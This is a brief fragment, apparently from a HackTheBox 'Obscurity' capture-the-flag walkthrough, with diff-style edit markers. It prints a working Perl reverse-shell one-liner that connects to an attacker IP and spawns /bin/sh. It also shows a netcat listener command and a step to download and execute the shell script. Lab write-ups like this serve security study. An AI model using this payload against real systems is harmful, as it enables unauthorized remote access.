Obscurity - HackTheBox

 perl -e 'use Socket;$i="10.10.14.81";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

-Start the netcat listener with nc -lnvp 1337
+Start the netcat listener with nc -lnvp 1337 and let's make a request to

 download the reverse shell script and execute it: